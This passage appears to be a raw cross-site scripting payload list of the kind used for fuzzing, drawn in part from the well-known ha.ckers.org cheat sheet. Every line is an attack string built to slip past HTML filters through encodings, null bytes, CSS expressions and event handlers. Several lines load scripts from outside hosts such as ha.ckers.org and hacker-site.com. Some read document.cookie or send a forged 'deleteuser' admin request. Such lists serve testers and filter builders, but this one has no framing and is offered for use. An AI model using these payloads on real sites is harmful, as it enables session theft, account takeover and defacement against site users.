SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +'';!--"<XSS>=&{()} +'>//\\,<'>">">"*" +'); alert('XSS +<script>alert(1);</script> +<script>alert('XSS');</script> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<scr<script>ipt>alert('XSS');</scr</script>ipt> +<script>alert(String.fromCharCode(88,83,83))</script> +<img src=foo.png onerror=alert(/xssed/) /> +<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> +<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> +<marquee><script>alert('XSS')</script></marquee> +<IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +"><script>alert(0)</script> +<script src=http://yoursite.com/your_files.js></script> +</title><script>alert(/xss/)</script> +</textarea><script>alert(/xss/)</script> +<IMG LOWSRC=\"javascript:alert('XSS')\"> +<IMG DYNSRC=\"javascript:alert('XSS')\"> +<font style='color:expression(alert(document.cookie))'> +<img src="javascript:alert('XSS')"> +<script language="JavaScript">alert('XSS')</script> +<body onunload="javascript:alert('XSS');"> +<body onLoad="alert('XSS');" +[color=red' onmouseover="alert('xss')"]mouse over[/color] +"/></a></><img src=1.gif onerror=alert(1)> +window.alert("Bonjour !"); +<div style="x:expression((window.r==1)?'':eval('r=1; +alert(String.fromCharCode(88,83,83));'))"> +<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> +"><script alert(String.fromCharCode(88,83,83))</script> +'>><marquee><h1>XSS</h1></marquee> +'">><script>alert('XSS')</script> +'">><marquee><h1>XSS</h1></marquee> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> +<script>var var = 1; alert(var)</script> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<?='<SCRIPT>alert("XSS")</SCRIPT>'?> +<IMG SRC='vbscript:msgbox(\"XSS\")'> +" onfocus=alert(document.domain) "> <" +<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> +<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS +perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out +perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out +<br size=\"&{alert('XSS')}\"> +<scrscriptipt>alert(1)</scrscriptipt> +</br style=a:expression(alert())> +</script><script>alert(1)</script> +"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +[color=red width=expression(alert(123))][color] +<BASE HREF="javascript:alert('XSS');//"> +Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +"></iframe><script>alert(123)</script> +<body onLoad="while(true) alert('XSS');"> +'"></title><script>alert(1111)</script> +</textarea>'"><script>alert(document.cookie)</script> +'""><script language="JavaScript"> alert('X \nS \nS');</script> +</script></script><<<<script><>>>><<<script>alert(123)</script> +<html><noalert><noscript>(123)</noscript><script>(123)</script> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +'></select><script>alert(123)</script> +'>"><script src = 'http://www.site.com/XSS.js'></script> +}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> +<SCRIPT>document.write("XSS");</SCRIPT> +a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); +='><script>alert("xss")</script> +<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> +<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> +">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> +">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> +src="http://www.site.com/XSS.js"></script> +data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= +!--" /><script>alert('xss');</script> +<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> +<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> +"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> +'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> +<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> +'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' +"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" +\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' +http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? +http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? +'); alert('xss'); var x=' +\\'); alert(\'xss\');var x=\' +//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); +>"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> +<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> +</body> +</html> +<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> +<SCRIPT> alert(“XSS”); </SCRIPT> +<BODY ONLOAD=alert("XSS")> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG SRC="javascript:alert('XSS');"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<IFRAME SRC=”http://hacker-site.com/xss.html”> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> +<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> +&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()} +&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt; +&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; +&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt; +&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt; +&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt; +&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt; +&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt; +&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt; +&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt; +Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser +exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;); +&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt; +&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt; +&lt;IMG SRC=&quot;livescript:[code]&quot;&gt; +%BCscript%BEalert(%A2XSS%A2)%BC/script%BE +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt; +&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;IMG SRC=&quot;mocha:[code]&quot;&gt; +&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt; +&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt; +a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d); +&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt; +&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt; +&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt; +&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt; +&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt; +&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt; +&lt;META 